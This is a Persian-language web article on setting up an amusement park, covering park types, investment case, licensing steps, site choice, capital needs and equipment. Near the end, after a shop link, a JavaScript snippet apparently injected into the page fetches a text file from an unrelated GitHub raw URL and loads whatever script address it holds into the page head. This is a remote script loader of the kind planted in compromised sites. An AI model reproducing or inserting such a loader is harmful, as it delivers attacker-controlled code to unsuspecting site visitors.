احداث شهربازی

احداث شهربازی

  • احداث شهر بازی – شهربازی یا به لاتین Amusement Park محوطه ای است که به صورت سرباز یا سرپوشیده وجود دارد، و درون آن وسایلی برای تفریح و سرگرم کردن مردم در سنین مختلف قرار گرفته، این وسایل به نسبت از محیط های معلولی و پارک ها دارای وسایل سرگرم کننده بیشتری است و معمولا برای استفاده از این وسایل مردم پول پرداخت می کنند.

    انواع شهربازی

    شهربازی روباز: شهربازی های روباز در محیط هایی با ویژگی های طبیعی ساخته می شوند. و با توجه به اینکه در ساخت شهربازی های روباز از دستگاههای مکانیکی استفاده می شود باید از امنیت بالاتری نسبت به شهربازی سرپوشیده برخوردار باشد. شهربازی های روباز یکی از مهم ترین عوامل برای جذب توریست محسوب می شوند.

    شهربازی سرپوشیده: شهربازی های سرپوشیده عموما در مراکز تجاری و هتل ها برای جلب مشتریان احداث می شود. تنوع در دستگاههای شهربازی سرپوشیده از مهمترین عواملی است که باید به آن دقت کرد.

    چرا باید در احداث شهربازی سرمایه گذاری کنیم؟

    بررسی هایی که کارشناسان در طرح توجیهی احداث شهربازی انجام داده اند، نشان دهنده این است که سرمایه گذاری در این بخش می تواند ایده ای خوب و هوشمندانه باشد. جوابگویی به نیاز انسان به تفریح و سرگرمی، پر کردن اوقات فراغت کودکان، نوجوانان و جوانان و همچنین شکوفایی استعدادهای فردی و اجتماعی از مزایای شهربازی ها می باشند.

    با بررسی تعداد و ظرفیت شهربازی هایی که در نقاط مختلف کشور احداث شده است، به این نتیجه می رسیم که متاسفانه کمبود جدی در این زمینه وجود دارد. بنابراین پتانسیل خوبی برای احداث شهربازی های سرپوشیده و روباز در شهرهای مختلف کشور قابل مشاهده است.

    مراحل کسب مجوز شهربازی

    اولین گام برای اخذ مجوز شهربازی، انتخاب مکان مناسب برای شهربازی با وسعت و ویژگی های مطلوب است. سپس باید اخذ مجوز ساخت از شهرداری یا سازمان های مربوطه انجام گردد. بعد از اخذ مجوز ساخت، نوبت به اخذ مجوز نصب دستگاه ها از سازمان استاندارد می رسد.

    در این مرحله با ارائه جواز ساخت ملک و ارائه مدارک حقیقی و حقوقی توسط سرمایه گذاران و پس از بازرسی کارشناس سازمان استاندارد از پروژه، مجوز نصب دستگاه ها و مجوز بهره برداری صادر می گردد. ضمن این که در پروسه اخذ مجوز باید استعلاماتی نیز از اتاق اصناف، نظام مهندسی و سازمان آتش نشانی دریافت گردد.

    پیدا کردن محل مناسب برای احداث شهربازی

    در طرح توجیهی شهربازی روباز باید ابتدا محلی برای تاسیس شهربازی انتخاب شود. در انتخاب محل احداث شهربازی روباز باید مسائل زیادی از جمله قوانین و مقررات نهادهای مربوطه مورد توجه قرار بگیرد. سایر مواردی که طرح توجیهی شهربازی روباز به آن‌ها می پردازد در زیر آمده است.

    • ابتدا باید شرایط آب و هوایی منطقه‌ای که برای احداث شهربازی روباز انتخاب می‌شود را در نظر بگیرید. به دلیل این‌که مردم معمولا در تعطیلات و روزهایی که هوا نسبتا خوب است، به فکر گردش و تفریح می‌افتند، بهتر است منطقه‌ای را برای احداث شهربازی انتخاب کنید که آب و هوای متعادلی داشته باشد.
    • برای اجرای طرح توجیهی شهربازی روباز، باید محلی برای تاسیس شهربازی در نظر گرفته شود که ساکنان آن منطقه و همچنین گردشگران به راحتی به آن مکان دسترسی داشته باشند و نیازی نباشد مسیر طولانی و سختی را برای رسیدن به شهربازی طی کنند. طی کردن مسیرهای طولانی ممکن است برای بعضی از افراد امکان‌پذیر نباشد.
    • قبل از انتخاب محل راه‌اندازی شهربازی به تجارت‌هایی که در مناطق اطراف آن محل در جریان هستند توجه کنید. در طرح توجیهی شهربازی روباز، بهتر است محلی انتخاب شود که همسایه‌های مشکل‌ساز نداشته باشد. برای مثال در منطقه‌ای که هیچ رقیبی وجود ندارد، توسعه‌ی کسب و کار راحت‌تر انجام می‌گیرد.
    • محل تاسیس شهربازی باید قابلیت این را داشته باشد که در صورت نیاز گسترده‌تر شود. ممکن است بعدها تمایل داشته باشید وسعت شهربازی خود را افزایش دهید، در نتیجه مکانی که قابلیت گسترده شدن داشته باشد، برای راه‌اندازی شهربازی روباز مناسب‌تر است.

    سرمایه لازم برای احداث شهربازی

    میزان سرمایه گذاری اولیه برای راه اندازی یک شهربازی به روباز یا سرپوشیده بودن شهربازی، وسعت شهربازی و ظرفیت آن بستگی دارد. بخش بزرگی از سرمایه اولیه به خریداری دستگاه های الکترومکانیکی شهربازی های روباز و دستگاه های گیمی، الکترونیکی، رومیزی، قلعه های بادی و … برای شهربازی های سرپوشیده اختصاص پیدا می کند.

    ضمن این که طراحی و فضاسازی شهربازی، راه اندازی تاسیسات برق رسانی، آب رسانی و تامین سایر زیرساخت ها نیز با سرمایه اولیه انجام می گردد.

    از آن جا که بهای دستگاه ها و وسایل بازی مرتبا در حال تغییر است، برای محاسبه سرمایه اولیه باید قیمت های روز استعلام شوند. محاسبه سرمایه گذاری اولیه در طرح توجیهی احداث شهربازی با احتساب ارزش روز تجهیزات شهربازی انجام می گردد.

    معرفی تجهیزات مورد نیاز در احداث شهربازی

    برخی از دستگاه های متداول که در شهربازی ها مورد نیاز هستند، عبارتند از:

    • دستگاه های مکانیکی و الکترومکانیکی (چرخ و فلک، صندلی پرنده، رنجر، قطار و … )
    • تجهیزات بازی الکترونیکی و گیمی (انواع بازی های ویدیویی مانند رالی، فیفا، بازی های اکشن و …)
    • دستگاه های جایزه ای (ربات چنگکی، ربات انگشتی و …)
    • دستگاه های ورزشی رومیزی
    • شبیه سازهای واقعیت مجازی
    • تجهیزات سینما 3 بعدی و 4 بعدی
    • وسایل بازی کودکان (سرسره های بادی، ترامپولین، استخر توپ و …)
    • دوربین های مداربسته
    • تجهیزات اطفاء حریق

    ورود به فروشگاه خرید وسایل شهربازی

    (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

    امتیاز شما:

    میانگین امتیازات ۳ از ۵
    از مجموع ۲ رای

    دیدگاهتان را بنویسید